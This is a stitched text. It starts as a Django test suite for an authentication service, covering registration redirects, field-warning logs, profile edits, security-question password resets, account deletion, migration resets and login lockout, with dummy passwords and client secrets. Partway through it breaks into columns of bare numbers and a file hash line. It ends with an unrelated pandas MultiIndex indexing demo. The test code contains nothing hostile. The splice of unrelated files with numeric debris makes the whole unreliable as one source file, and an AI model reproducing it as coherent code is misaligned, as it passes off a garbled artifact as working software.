# Test with redirect URI set.
Client.objects.create(
client_id="redirect-tester-2",
name="RedirectClient",
client_secret="super_client_secret_4",
response_type="code",
jwt_alg="HS256",
redirect_uris=["/test-redirect-url-something/"],
)
response = self.client.get(
reverse(
"registration"
) + "?client_id=redirect-tester-2&redirect_uri=/test-redirect-url-something/",
)
response = self.client.get(
reverse(
"redirect_view"
)
)
self.assertEquals(response.url, "/test-redirect-url-something/")
def test_incorrect_required_field_logger(self):
test_output = [
'WARNING:authentication_service.forms:Received required field that is not on form: notontheform',
'WARNING:authentication_service.forms:Received required field that is not on form: notontheform',
'WARNING:authentication_service.forms:Received required field that is not on form: notontheform',
'WARNING:authentication_service.forms:Received required field that is not on form: notontheform',
'WARNING:authentication_service.forms:Received required field that is not on form: notontheform',
'WARNING:authentication_service.forms:Received required field that is not on form: notontheform',
'WARNING:authentication_service.forms:Received required field that is not on form: notontheform',
'WARNING:authentication_service.forms:Received required field that is not on form: notontheform',
'WARNING:authentication_service.forms:Received required field that is not on form: notontheform',
'WARNING:authentication_service.forms:Received required field that is not on form: notontheform',
'WARNING:authentication_service.forms:Received required field that is not on form: someawesomefield',
'WARNING:authentication_service.forms:Received required field that is not on form: someawesomefield',
'WARNING:authentication_service.forms:Received required field that is not on form: someawesomefield',
'WARNING:authentication_service.forms:Received required field that is not on form: someawesomefield',
'WARNING:authentication_service.forms:Received required field that is not on form: someawesomefield',
'WARNING:authentication_service.forms:Received required field that is not on form: someawesomefield',
'WARNING:authentication_service.forms:Received required field that is not on form: someawesomefield',
'WARNING:authentication_service.forms:Received required field that is not on form: someawesomefield',
'WARNING:authentication_service.forms:Received required field that is not on form: someawesomefield',
'WARNING:authentication_service.forms:Received required field that is not on form: someawesomefield'
]
test_output.sort()
with self.assertLogs(level="WARNING") as cm:
self.client.get(
reverse("registration") +
"?requires=names"
# TODO: S3-reliant
#"&requires=picture"
"&requires=someawesomefield"
"&requires=notontheform",
follow=True
)
output = cm.output
output.sort()
self.assertListEqual(output, test_output)
def test_incorrect_hidden_field_logger(self):
test_output = [
'WARNING:authentication_service.forms:Received hidden field that is not on form: notontheform',
'WARNING:authentication_service.forms:Received hidden field that is not on form: notontheform',
'WARNING:authentication_service.forms:Received hidden field that is not on form: notontheform',
'WARNING:authentication_service.forms:Received hidden field that is not on form: notontheform',
'WARNING:authentication_service.forms:Received hidden field that is not on form: notontheform',
'WARNING:authentication_service.forms:Received hidden field that is not on form: notontheform',
'WARNING:authentication_service.forms:Received hidden field that is not on form: notontheform',
'WARNING:authentication_service.forms:Received hidden field that is not on form: notontheform',
'WARNING:authentication_service.forms:Received hidden field that is not on form: notontheform',
'WARNING:authentication_service.forms:Received hidden field that is not on form: notontheform',
'WARNING:authentication_service.forms:Received hidden field that is not on form: someawesomefield',
'WARNING:authentication_service.forms:Received hidden field that is not on form: someawesomefield',
'WARNING:authentication_service.forms:Received hidden field that is not on form: someawesomefield',
'WARNING:authentication_service.forms:Received hidden field that is not on form: someawesomefield',
'WARNING:authentication_service.forms:Received hidden field that is not on form: someawesomefield',
'WARNING:authentication_service.forms:Received hidden field that is not on form: someawesomefield',
'WARNING:authentication_service.forms:Received hidden field that is not on form: someawesomefield',
'WARNING:authentication_service.forms:Received hidden field that is not on form: someawesomefield',
'WARNING:authentication_service.forms:Received hidden field that is not on form: someawesomefield',
'WARNING:authentication_service.forms:Received hidden field that is not on form: someawesomefield'
]
test_output.sort()
with self.assertLogs(level="WARNING") as cm:
self.client.get(
reverse("registration") +
"?hide=end-user"
# TODO: S3-reliant
#"&hide=avatar"
"&hide=someawesomefield"
"&hide=notontheform",
follow=True
)
output = cm.output
output.sort()
self.assertListEqual(output, test_output)
def test_view_terms_html(self):
Client.objects.create(
client_id="registraion_client_id",
name= "RegistrationMigrationCLient",
client_secret= "super_client_secret_1",
response_type= "code",
jwt_alg= "HS256",
redirect_uris= ["http://exmpl.co/"],
terms_url="http://registration-terms.com"
)
response = self.client.get(
reverse("registration"),
follow=True
)
self.assertContains(response, '<a href="https://www.girleffect.org/'\
'terms-and-conditions/">Click here to view the terms and conditions</a>'
)
response = self.client.get(
reverse(
"registration"
) + "?client_id=registraion_client_id&redirect_uri=http://exmpl.co/",
follow=True,
)
self.assertContains(response, '<a href="http://registration-terms.com">'\
'Click here to view the terms and conditions</a>'
)
def test_question_preselect(self):
# Test with redirect URI set.
response = self.client.get(
reverse(
"registration"
) + f"?question_ids={self.question_four.id}&question_ids={self.question_three.id}",
follow=True
)
response = self.client.post(
response.redirect_chain[-1][0],
{
"registration_wizard-current_step": "userdata",
"userdata-username": "stupidnowrequiredtestuseroriginal",
"userdata-gender": "female",
"userdata-age": "16",
"userdata-password1": "awesom#saFe3",
"userdata-password2": "awesom#saFe3",
"userdata-birth_date": "2000-01-01",
"userdata-terms": True,
"userdata-msisdn": "0856545698",
},
follow=True
)
self.assertContains(
response,
f'<option value="{self.question_four.id}" selected>{self.question_four.question_text}</option>'
)
self.assertContains(
response,
f'<option value="{self.question_three.id}" selected>{self.question_three.question_text}</option>'
)
def test_question_preselect_incorrect_id(self):
# Test with redirect URI set.
response = self.client.get(
reverse(
"registration"
) + f"?question_ids=9999999&question_ids={self.question_three.id}",
follow=True
)
response = self.client.post(
response.redirect_chain[-1][0],
{
"registration_wizard-current_step": "userdata",
"userdata-username": "stupidnowrequiredtestuser",
"userdata-gender": "female",
"userdata-age": "16",
"userdata-password1": "awesom#saFe3",
"userdata-password2": "awesom#saFe3",
"userdata-birth_date": "2000-01-01",
"userdata-terms": True,
"userdata-msisdn": "0856545698",
},
follow=True
)
self.assertContains(
response,
f'<option value="{self.question_three.id}" selected>{self.question_three.question_text}</option>',
count=1
)
class EditProfileViewTestCase(TestCase):
@classmethod
def setUpTestData(cls):
cls.user = get_user_model().objects.create_superuser(
username="testuser",
email="wrong@email.com",
password="Qwer!234",
birth_date=datetime.date(2001, 12, 12)
)
cls.user.save()
cls.twofa_user = get_user_model().objects.create_superuser(
username="2fa_user", password="1234", email="2fa_user@test.com",
birth_date=datetime.date(2001, 1, 1)
)
cls.twofa_user.save()
cls.totp_device = TOTPDevice.objects.create(
user=cls.twofa_user,
name="default",
confirmed=True,
key=random_hex().decode()
)
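        # a confirmed TOTPDevice is what marks this user as having 2FA set up;
        # test_2fa_link_enabled below depends on it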
# Security questions
cls.text_one = SecurityQuestion.objects.create(
question_text="Some text for the one question"
)
cls.text_two = SecurityQuestion.objects.create(
question_text="Some text for the other question"
)
cls.question_one = UserSecurityQuestion.objects.create(
user=cls.user,
question=cls.text_one,
language_code="en",
answer="Answer1"
)
cls.question_two = UserSecurityQuestion.objects.create(
user=cls.user,
question=cls.text_two,
language_code="en",
answer="Answer2"
)
def test_profile_edit(self):
# Login user
self.client.login(username="testuser", password="Qwer!234")
# Get form
Client.objects.create(
client_id="postprofileedit",
name= "RegistrationMigrationCLient",
client_secret= "super_client_secret_1",
response_type= "code",
jwt_alg= "HS256",
redirect_uris= ["/admin/"],
terms_url="http://registration-terms.com"
)
response = self.client.get(
reverse(
"edit_profile"
) + "?client_id=postprofileedit&redirect_uri=/admin/",
)
# Check 2FA isn't enabled
self.assertNotContains(response, "2fa")
# Post form
response = self.client.post(
reverse(
"edit_profile"
),
{
"email": "test@user.com",
"birth_date": "2001-01-01",
"gender": "female"
},
follow=True
)
updated = get_user_model().objects.get(username="testuser")
self.assertEquals(updated.email, "test@user.com")
self.assertEquals(datetime.date(2001, 1, 1), updated.birth_date)
self.assertRedirects(response, reverse("admin:index"))
response = self.client.get(reverse("edit_profile"))
with mock.patch("authentication_service.forms.date") as mocked_date:
mocked_date.today.return_value = datetime.date(2018, 1, 2)
mocked_date.side_effect = lambda *args, **kw: datetime.date(*args, **kw)
response = self.client.post(
reverse("edit_profile"),
{
"email": "test@user.com",
"age": "14",
"gender": "female"
},
follow=True
)
updated = get_user_model().objects.get(username="testuser")
self.assertEquals(updated.email, "test@user.com")
self.assertEquals(datetime.date(2004, 1, 2), updated.birth_date)
def test_2fa_link_enabled(self):
# Login user
self.client.login(username="2fa_user", password="1234")
# Get form
response = self.client.get(
reverse("edit_profile")
)
# Check 2FA is enabled and present on edit page
self.assertContains(response, "2fa")
def test_security_questions_update(self):
self.client.login(username=self.user.username, password="Qwer!234")
response = self.client.post(
reverse("update_security_questions"),
{
"form-TOTAL_FORMS": "2",
"form-INITIAL_FORMS": "2",
"form-MIN_NUM_FORMS": "0",
"form-MAX_NUM_FORMS": "1000",
"form-0-question": self.text_one.id,
"form-0-answer": "AnswerFirst",
"form-0-id": self.question_one.id,
"form-1-question": self.text_two.id,
"form-1-answer": "AnswerSecond",
"form-1-id": self.question_two.id,
},
)
question_one = UserSecurityQuestion.objects.get(
id=self.question_one.id
)
question_two = UserSecurityQuestion.objects.get(
id=self.question_two.id
)
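        # answers are lowercased and hashed before storage, so compare with
        # hashers.check_password rather than plain string equality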
self.assertTrue(hashers.check_password(
"AnswerFirst".lower(),
question_one.answer)
)
self.assertTrue(hashers.check_password(
"AnswerSecond".lower(),
question_two.answer)
)
class ResetPasswordTestCase(TestCase):
@classmethod
def setUpTestData(cls):
cls.user = get_user_model().objects.create(
username="identifiable_user", email="user@id.com",
birth_date=datetime.date(2001, 1, 1)
)
cls.user.set_password("1234")
cls.user.save()
cls.user_no_email = get_user_model().objects.create(
username="user_no_email",
birth_date=datetime.date(2001, 1, 1)
)
cls.user.set_password("1234")
cls.user.save()
cls.question_one = SecurityQuestion.objects.create(
question_text="Some text for the one question"
)
cls.question_two = SecurityQuestion.objects.create(
question_text="Some text for the other question"
)
cls.user_answer_one = UserSecurityQuestion.objects.create(
user=cls.user_no_email, question=cls.question_one,
language_code="en", answer="one"
)
cls.user_answer_two = UserSecurityQuestion.objects.create(
user=cls.user_no_email, question=cls.question_two,
language_code="en", answer="two"
)
def test_logged_in_user(self):
url = reverse('reset_password')
res = self.client.get(url)
self.assertEqual(res.status_code, 200)
        # force login a user; they should now be redirected away from this page
self.client.force_login(self.user)
res = self.client.get(url)
self.assertEqual(res.status_code, 302)
def test_username_as_identifier(self):
response = self.client.post(
reverse("reset_password"),
data={
"email": "user_no_email"
}
)
self.assertRedirects(
response, reverse("reset_password_security_questions"))
@patch("authentication_service.tasks.send_mail.apply_async")
def test_email_as_identifier(self, send_mail):
response = self.client.post(
reverse("reset_password"),
data={
"email": "user@id.com"
}
)
send_mail.assert_called()
self.assertNotIn("User not found", response)
self.assertEquals(response.status_code, 302)
self.assertEquals(response.url, reverse("password_reset_done"))
def test_user_not_found(self):
response = self.client.post(
reverse("reset_password"),
data={
"email": "identifiable_user2"
}
)
self.assertRedirects(response, reverse("password_reset_done"))
response = self.client.post(
reverse("reset_password"),
data={
"email": "user2@id.com"
}
)
self.assertRedirects(response, reverse("password_reset_done"))
def test_security_question_reset(self):
        # Explicitly set a session variable to access
session = self.client.session
session["lookup_user_id"] = str(self.user_no_email.id)
session.save()
response = self.client.get(
reverse("reset_password_security_questions")
)
self.assertContains(response, "question_%s" % self.user_answer_one.id)
self.assertContains(response, "question_%s" % self.user_answer_two.id)
response = self.client.post(
reverse("reset_password_security_questions"),
data={
"question_%s" % self.user_answer_one.id: "one",
"question_%s" % self.user_answer_two.id: "three"
}
)
self.assertContains(response, "One or more answers are incorrect")
response = self.client.post(
reverse("reset_password_security_questions"),
data={
"question_%s" % self.user_answer_one.id: "one",
"question_%s" % self.user_answer_two.id: "two"
}
)
# Redirects to password reset confirm view
self.assertEquals(response.status_code, 302)
class DeleteAccountTestCase(TestCase):
@classmethod
def setUpTestData(cls):
cls.user = get_user_model().objects.create(
username="leaving_user", email="awol@id.com",
birth_date=datetime.date(2001, 1, 1)
)
cls.user.set_password("atleast_its_not_1234")
cls.user.save()
def test_view_html_toggle(self):
self.client.login(username=self.user.username, password="atleast_its_not_1234")
response = self.client.get(reverse("delete_account"))
self.assertNotContains(response, "confirmed_deletion")
response = self.client.post(
reverse("delete_account"),
data={
"reason": "The theme is ugly"
}
)
self.assertContains(
response,
'<input name="confirmed_deletion" type="submit" value="Delete account" class="Button" />'
)
self.assertContains(response,
"<textarea name=\"reason\" cols=\"40\" rows=\"10\" id=\"id_reason\" class=\" Textarea \">"
)
@patch("authentication_service.tasks.send_mail.apply_async")
def test_mail_task_fires(self, send_mail):
self.test_view_html_toggle()
response = self.client.post(
reverse("delete_account"),
data={
"reason": "The theme is ugly",
"confirmed_deletion": "Are you sure?"
}
)
send_mail.assert_called_with(
kwargs={
"context": {"reason": "The theme is ugly"},
"mail_type": "delete_account",
"objects_to_fetch": [{
"app_label": "authentication_service",
"model": "coreuser",
"id": self.user.id,
"context_key": "user"}]
}
)
class TestMigrationPasswordReset(TestCase):
def goto_login(self):
# Setup session values
return self.client.get(
f"{reverse('oidc_provider:authorize')}?response_type=code&scope=openid&client_id=migration_client_id&redirect_uri=http%3A%2F%2Fexample.com%2F&state=3G3Rhw9O5n0okXjZ6mEd2paFgHPxOvoO",
follow=True
)
@classmethod
def setUpTestData(cls):
super(TestMigrationPasswordReset, cls).setUpTestData()
cls.temp_user = TemporaryMigrationUserStore.objects.create(
username="forgetfulmigrateduser",
client_id="migration_client_id",
user_id=4,
answer_one="a",
answer_two="b",
question_one={'en': 'Some awesome question'},
question_two={'en': 'Another secure question'}
)
cls.temp_user.set_password("Qwer!234")
cls.temp_user.set_answers("Answer1", "Answer2")
Client.objects.create(
client_id="migration_client_id",
name= "MigrationCLient",
client_secret= "super_client_secret_1",
response_type= "code",
jwt_alg= "HS256",
redirect_uris= ["http://example.com/"]
)
@override_settings(ACCESS_CONTROL_API=MagicMock())
def test_no_answers(self):
temp_user = TemporaryMigrationUserStore.objects.create(
username="reallyforgetfulmigrateduser",
client_id="migration_client_id",
user_id=6,
question_one={},
question_two={}
)
# Setup session values
self.client.get(
f"{reverse('oidc_provider:authorize')}?response_type=code&scope=openid&client_id=migration_client_id&redirect_uri=http%3A%2F%2Fexample.com%2F&state=3G3Rhw9O5n0okXjZ6mEd2paFgHPxOvoO",
follow=True
)
response = self.client.post(
reverse("reset_password"),
data={
"email": "reallyforgetfulmigrateduser"
},
follow=True
)
messages = list(get_messages(response.wsgi_request))
self.assertEqual(len(messages), 1)
self.assertEqual(
messages[0].message,
"We are sorry, your account can not perform this action"
)
self.assertEqual(
messages[0].level_tag,
"warning"
)
@override_settings(ACCESS_CONTROL_API=MagicMock())
def test_securityquestion_step_404(self):
temp_user = TemporaryMigrationUserStore.objects.create(
username="404migrateduser",
client_id="migration_client_id",
question_one={"en": "Some awesome question"},
question_two={"en": "Another secure question"},
user_id=7
)
temp_user.set_password("Qwer!234")
temp_user.set_answers("Answer1", "Answer2")
self.client.get(
f"{reverse('oidc_provider:authorize')}?response_type=code&scope=openid&client_id=migration_client_id&redirect_uri=http%3A%2F%2Fexample.com%2F&state=3G3Rhw9O5n0okXjZ6mEd2paFgHPxOvoO",
follow=True
)
response = self.client.post(
reverse("reset_password"),
data={
"email": "404migrateduser"
},
follow=True
)
url = response.redirect_chain[-1][0]
TemporaryMigrationUserStore.objects.filter(
username="404migrateduser",
client_id="migration_client_id",
user_id=7
).delete()
response = self.client.get(url)
self.assertEqual(response.status_code, 404)
@override_settings(ACCESS_CONTROL_API=MagicMock())
@patch("django.core.signing.loads")
def test_securityquestion_step_expired_token(self, expire_mock):
temp_user = TemporaryMigrationUserStore.objects.create(
username="404migrateduser",
client_id="migration_client_id",
question_one={"en": "Some awesome question"},
question_two={"en": "Another secure question"},
user_id=50
)
temp_user.set_password("Qwer!234")
temp_user.set_answers("Answer1", "Answer2")
self.client.get(
f"{reverse('oidc_provider:authorize')}?response_type=code&scope=openid&client_id=migration_client_id&redirect_uri=http%3A%2F%2Fexample.com%2F&state=3G3Rhw9O5n0okXjZ6mEd2paFgHPxOvoO",
follow=True
)
expire_mock.side_effect = signing.SignatureExpired("Expired")
response = self.client.post(
reverse("reset_password"),
data={
"email": "404migrateduser"
},
follow=True
)
self.assertRedirects(
response,
"/en/login/"
)
messages = list(get_messages(response.wsgi_request))
self.assertEqual(len(messages), 1)
self.assertEqual(
messages[0].message,
"Password reset url has expired, please restart the password reset proces."
)
self.assertEqual(
messages[0].level_tag,
"error"
)
@override_settings(ACCESS_CONTROL_API=MagicMock())
def test_one_answer(self):
temp_user = TemporaryMigrationUserStore.objects.create(
username="slightlyforgetfulmigrateduser",
client_id="migration_client_id",
user_id=6,
question_one={'en': 'Some awesome question'},
question_two={}
)
temp_user.set_answers("Answer1")
# Setup session values
self.client.get(
f"{reverse('oidc_provider:authorize')}?response_type=code&scope=openid&client_id=migration_client_id&redirect_uri=http%3A%2F%2Fexample.com%2F&state=3G3Rhw9O5n0okXjZ6mEd2paFgHPxOvoO",
follow=True
)
response = self.client.post(
reverse("reset_password"),
data={
"email": "slightlyforgetfulmigrateduser"
},
follow=True
)
token_url = response.redirect_chain[-1][0]
self.assertIn(
"/en/user-migration/question-gate/",
token_url
)
self.assertContains(
response,
'<input type="hidden" name="answer_two" disabled id="id_answer_two" class=" HiddenInput " />'
)
self.assertContains(
response,
f'<input type="hidden" value="{temp_user.username}" name="auth-username">'
)
response = self.client.post(
token_url,
data={
"answer_one": "slightlyforgetfulmigrateduser"
},
follow=True
)
self.assertEqual(
response.context["form"].non_field_errors(),
["Incorrect answer provided"]
)
response = self.client.post(
token_url,
data={
"answer_one": "Answer1"
},
follow=True
)
token_url = response.redirect_chain[-1][0]
self.assertIn(
"/en/user-migration/password-reset/",
token_url
)
@override_settings(ACCESS_CONTROL_API=MagicMock())
def test_question_gate_view(self):
response = self.goto_login()
self.assertRedirects(
response,
"/en/login/?next=/openid/authorize%3Fresponse_type%3Dcode%26scope%3Dopenid%26client_id%3Dmigration_client_id%26redirect_uri%3Dhttp%253A%252F%252Fexample.com%252F%26state%3D3G3Rhw9O5n0okXjZ6mEd2paFgHPxOvoO"
)
response = self.client.post(
reverse("reset_password"),
data={
"email": "forgetfulmigrateduser"
},
follow=True
)
token_url = response.redirect_chain[-1][0]
self.assertIn(
"/en/user-migration/question-gate/",
token_url
)
self.assertContains(
response,
"Some awesome question"
)
self.assertContains(
response,
"Another secure question"
)
response = self.client.post(
token_url,
data={
"answer_one": "forgetfulmigrateduser",
"answer_two": "forgetfulmigrateduser"
},
)
self.assertEqual(
response.context["form"].non_field_errors(),
["Incorrect answers provided"]
)
response = self.client.post(
token_url,
data={
"answer_one": "Answer1",
"answer_two": "Answer2"
},
follow=True
)
token_url = response.redirect_chain[-1][0]
self.assertIn(
"/en/user-migration/password-reset/",
token_url
)
return token_url
@override_settings(ACCESS_CONTROL_API=MagicMock())
def test_question_gate_language_404(self):
response = self.goto_login()
self.assertRedirects(
response,
"/en/login/?next=/openid/authorize%3Fresponse_type%3Dcode%26scope%3Dopenid%26client_id%3Dmigration_client_id%26redirect_uri%3Dhttp%253A%252F%252Fexample.com%252F%26state%3D3G3Rhw9O5n0okXjZ6mEd2paFgHPxOvoO"
)
# Change language
response = self.client.get(
f"/prs{reverse('reset_password')}",
follow=True
)
response = self.client.post(
reverse("reset_password"),
data={
"email": "forgetfulmigrateduser"
},
follow=True
)
self.assertEqual(response.status_code, 404)
self.assertIn(b"<p>No question translation matching the current language could be found.</p>", response.content)
@override_settings(ACCESS_CONTROL_API=MagicMock())
def test_password_reset_view(self):
url = self.test_question_gate_view()
response = self.client.post(
url,
data={
"password_one": "aaaaaa",
"password_two": "bbbbbb"
}
)
self.assertEqual(
response.context["form"].errors,
{"password_two": ["Passwords do not match."]}
)
response = self.client.post(
url,
data={
"password_one": "aa",
"password_two": "aa"
}
)
self.assertEqual(
response.context["form"].errors,
{"password_two": ["Password not long enough."]}
)
response = self.client.post(
url,
data={
"password_one": "CoolNew",
"password_two": "CoolNew"
},
follow=True
)
self.assertRedirects(
response,
"/en/reset-password/done/"
)
user = TemporaryMigrationUserStore.objects.get(
username=self.temp_user.username,
client_id=self.temp_user.client_id,
user_id=self.temp_user.user_id,
)
self.assertTrue(user.check_password("CoolNew"))
@override_settings(ACCESS_CONTROL_API=MagicMock())
def test_ensure_client_id_always_present(self):
temp_user = TemporaryMigrationUserStore.objects.create(
username="Ididnotrealyforgetanything",
client_id="migration_client_id",
user_id=7,
question_one={'en': 'Some awesome question'},
question_two={}
)
temp_user.set_answers("Answer1")
# Setup session values
self.client.get(
f"{reverse('oidc_provider:authorize')}?response_type=code&scope=openid&client_id=migration_client_id&redirect_uri=http%3A%2F%2Fexample.com%2F&state=3G3Rhw9O5n0okXjZ6mEd2paFgHPxOvoO",
follow=True
)
# Trigger session values clear and setup again
self.client.get(
f"{reverse('oidc_provider:authorize')}?response_type=code&scope=openid&client_id=migration_client_id&redirect_uri=http%3A%2F%2Fexample.com%2F&state=3G3Rhw9O5n0okXjZ6mEd2paFgHPxOvoO",
follow=True
)
response = self.client.post(
reverse("reset_password"),
data={
"email": "Ididnotrealyforgetanything"
},
follow=True
)
token_url = response.redirect_chain[-1][0]
self.assertIn(
"/en/user-migration/question-gate/",
token_url
)
class TestMigrationPasswordResetLockout(TestCase):
def goto_login(self):
# Setup session values
return self.client.get(
f"{reverse('oidc_provider:authorize')}?response_type=code&scope=openid&client_id=migration_client_id&redirect_uri=http%3A%2F%2Fexample.com%2F&state=3G3Rhw9O5n0okXjZ6mEd2paFgHPxOvoO",
follow=True
)
@classmethod
def setUpTestData(cls):
super(TestMigrationPasswordResetLockout, cls).setUpTestData()
cls.temp_user = TemporaryMigrationUserStore.objects.create(
username="forgetfulmigrateduser",
client_id="migration_client_id",
user_id=4,
answer_one="a",
answer_two="b",
question_one={'en': 'Some awesome question'},
question_two={'en': 'Another secure question'}
)
cls.temp_user.set_password("Qwer!234")
cls.temp_user.set_answers("Answer1", "Answer2")
Client.objects.create(
client_id="migration_client_id",
name= "MigrationCLient",
client_secret= "super_client_secret_1",
response_type= "code",
jwt_alg= "HS256",
redirect_uris= ["http://example.com/"]
)
@override_settings(ACCESS_CONTROL_API=MagicMock())
def test_lockout(self):
response = self.goto_login()
self.assertRedirects(
response,
"/en/login/?next=/openid/authorize%3Fresponse_type%3Dcode%26scope%3Dopenid%26client_id%3Dmigration_client_id%26redirect_uri%3Dhttp%253A%252F%252Fexample.com%252F%26state%3D3G3Rhw9O5n0okXjZ6mEd2paFgHPxOvoO"
)
response = self.client.post(
reverse("reset_password"),
data={
"email": "forgetfulmigrateduser"
},
follow=True
)
token_url = response.redirect_chain[-1][0]
self.assertIn(
"/en/user-migration/question-gate/",
token_url
)
self.assertContains(
response,
"Some awesome question"
)
self.assertContains(
response,
"Another secure question"
)
unblock_username(self.temp_user.username)
allowed_attempts = settings.DEFENDER_LOGIN_FAILURE_LIMIT
attempt = 0
while attempt < allowed_attempts:
attempt += 1
response = self.client.post(
token_url,
data={
"auth-username": self.temp_user.username,
"answer_one": "forgetfulmigrateduser",
"answer_two": "forgetfulmigrateduser"
},
)
self.assertEqual(
response.context["form"].non_field_errors(),
["Incorrect answers provided"]
)
self.assertEqual(response.status_code, 200)
self.assertIn("authentication_service/form.html",
response.template_name)
# The next (failed) attempt needs to prevent further attempts
with self.assertTemplateUsed("authentication_service/lockout.html"):
response = self.client.post(
token_url,
data={
"auth-username": self.temp_user.username,
"answer_one": "forgetfulmigrateduser",
"answer_two": "forgetfulmigrateduser"
},
follow=True
)
with self.assertTemplateUsed("authentication_service/lockout.html"):
response = self.client.post(
token_url,
data={
"auth-username": self.temp_user.username,
"answer_one": "Answer1",
"answer_two": "Answer2"
},
follow=True
)
# Manually unblock the username. This allows the user to try again.
unblock_username(self.temp_user.username)
class HealthCheckTestCase(TestCase):
def test_healthcheck(self):
response = self.client.get(reverse("healthcheck"))
self.assertContains(response, "host")
self.assertContains(response, "server_timestamp")
self.assertContains(response, "db_timestamp")
self.assertContains(response, "version")
class TestResetPasswordSecurityQuestionsView(TestCase):
@classmethod
def setUpTestData(cls):
super().setUpTestData()
cls.user = get_user_model().objects.create_user(
username="user_who_forgets_creds",
password="Qwer!234",
birth_date=datetime.date(2001, 1, 1)
)
cls.user.save()
cls.question_one = SecurityQuestion.objects.create(
question_text="Some text for the one question"
)
cls.question_two = SecurityQuestion.objects.create(
question_text="Some text for the other question"
)
cls.user_answer_one = UserSecurityQuestion.objects.create(
question=cls.question_one,
user=cls.user,
answer=make_password("right")
)
cls.user_answer_two = UserSecurityQuestion.objects.create(
question=cls.question_two,
user=cls.user,
answer=make_password("right")
)
def test_with_no_answer(self):
# Sets up the lookup user id
response = self.client.post(
reverse("reset_password"), {"email": self.user.username}, follow=True)
response = self.client.post(
response.redirect_chain[-1][0],
{}
)
self.assertEqual(
response.context["form"].errors,
{
f"question_{self.user_answer_one.id}": [
"This field is required."],
f"question_{self.user_answer_two.id}": [
"This field is required."],
"__all__": ["Please answer all your security questions."],
}
)
| 38.430139
| 220
| 0.578684
| 8,740
| 91,041
| 5.842792
| 0.070252
| 0.029374
| 0.036306
| 0.030157
| 0.841597
| 0.813457
| 0.790311
| 0.755395
| 0.7289
| 0.70593
| 0
| 0.022747
| 0.31432
| 91,041
| 2,368
| 221
| 38.446368
| 0.79529
| 0.027987
| 0
| 0.624822
| 0
| 0.007133
| 0.291819
| 0.139059
| 0
| 0
| 0
| 0.000422
| 0.084165
| 1
| 0.035663
| false
| 0.062292
| 0.010937
| 0.001427
| 0.055159
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 7
|
e8e51b34756756ecd8d13554c4a3db42d9354da3
| 9,706
|
py
|
Python
|
notebook/pandas_multiindex_indexing.py
|
vhn0912/python-snippets
|
80b2e1d6b2b8f12ae30d6dbe86d25bb2b3a02038
|
[
"MIT"
] | 174
|
2018-05-30T21:14:50.000Z
|
2022-03-25T07:59:37.000Z
|
notebook/pandas_multiindex_indexing.py
|
vhn0912/python-snippets
|
80b2e1d6b2b8f12ae30d6dbe86d25bb2b3a02038
|
[
"MIT"
] | 5
|
2019-08-10T03:22:02.000Z
|
2021-07-12T20:31:17.000Z
|
notebook/pandas_multiindex_indexing.py
|
vhn0912/python-snippets
|
80b2e1d6b2b8f12ae30d6dbe86d25bb2b3a02038
|
[
"MIT"
] | 53
|
2018-04-27T05:26:35.000Z
|
2022-03-25T07:59:37.000Z
|
import pandas as pd
df = pd.read_csv('data/src/sample_multi.csv', index_col=[0, 1, 2])
print(df)
# val_1 val_2
# level_1 level_2 level_3
# A0 B0 C0 98 90
# C1 44 9
# B1 C2 39 17
# C3 75 71
# A1 B2 C0 1 89
# C1 54 60
# B3 C2 47 6
# C3 16 5
# A2 B0 C0 75 22
# C1 19 4
# B1 C2 25 52
# C3 57 40
# A3 B2 C0 64 54
# C1 27 96
# B3 C2 100 77
# C3 22 50
print(df.index)
# MultiIndex(levels=[['A0', 'A1', 'A2', 'A3'], ['B0', 'B1', 'B2', 'B3'], ['C0', 'C1', 'C2', 'C3']],
# labels=[[0, 0, 0, 0, 1, 1, 1, 1, 2, 2, 2, 2, 3, 3, 3, 3], [0, 0, 1, 1, 2, 2, 3, 3, 0, 0, 1, 1, 2, 2, 3, 3], [0, 1, 2, 3, 0, 1, 2, 3, 0, 1, 2, 3, 0, 1, 2, 3]],
# names=['level_1', 'level_2', 'level_3'])
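# The CSV file read above is not included with this snippet. A minimal sketch that rebuilds a
# frame with the same 3-level MultiIndex (the values here would be random, not the ones shown above):
# import numpy as np
# tuples = [('A0', 'B0', 'C0'), ('A0', 'B0', 'C1'), ('A0', 'B1', 'C2'), ('A0', 'B1', 'C3'),
#           ('A1', 'B2', 'C0'), ('A1', 'B2', 'C1'), ('A1', 'B3', 'C2'), ('A1', 'B3', 'C3'),
#           ('A2', 'B0', 'C0'), ('A2', 'B0', 'C1'), ('A2', 'B1', 'C2'), ('A2', 'B1', 'C3'),
#           ('A3', 'B2', 'C0'), ('A3', 'B2', 'C1'), ('A3', 'B3', 'C2'), ('A3', 'B3', 'C3')]
# idx = pd.MultiIndex.from_tuples(tuples, names=['level_1', 'level_2', 'level_3'])
# df = pd.DataFrame(np.random.randint(0, 101, size=(len(tuples), 2)),
#                   index=idx, columns=['val_1', 'val_2'])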
print(df.loc['A0', 'val_1'])
# level_2 level_3
# B0 C0 98
# C1 44
# B1 C2 39
# C3 75
# Name: val_1, dtype: int64
print(df.loc['A0', :])
# val_1 val_2
# level_2 level_3
# B0 C0 98 90
# C1 44 9
# B1 C2 39 17
# C3 75 71
print(df.loc['A0'])
# val_1 val_2
# level_2 level_3
# B0 C0 98 90
# C1 44 9
# B1 C2 39 17
# C3 75 71
print(df.loc['A0':'A2', :])
# val_1 val_2
# level_1 level_2 level_3
# A0 B0 C0 98 90
# C1 44 9
# B1 C2 39 17
# C3 75 71
# A1 B2 C0 1 89
# C1 54 60
# B3 C2 47 6
# C3 16 5
# A2 B0 C0 75 22
# C1 19 4
# B1 C2 25 52
# C3 57 40
print(df.loc[['A0', 'A2'], :])
# val_1 val_2
# level_1 level_2 level_3
# A0 B0 C0 98 90
# C1 44 9
# B1 C2 39 17
# C3 75 71
# A2 B0 C0 75 22
# C1 19 4
# B1 C2 25 52
# C3 57 40
print(df.loc[('A0', 'B1'), :])
# val_1 val_2
# level_3
# C2 39 17
# C3 75 71
print(df.loc[('A0', 'B1', 'C2'), :])
# val_1 39
# val_2 17
# Name: (A0, B1, C2), dtype: int64
print(df.loc[(['A0', 'A1'], ['B0', 'B3']), :])
# val_1 val_2
# level_1 level_2 level_3
# A0 B0 C0 98 90
# C1 44 9
# A1 B3 C2 47 6
# C3 16 5
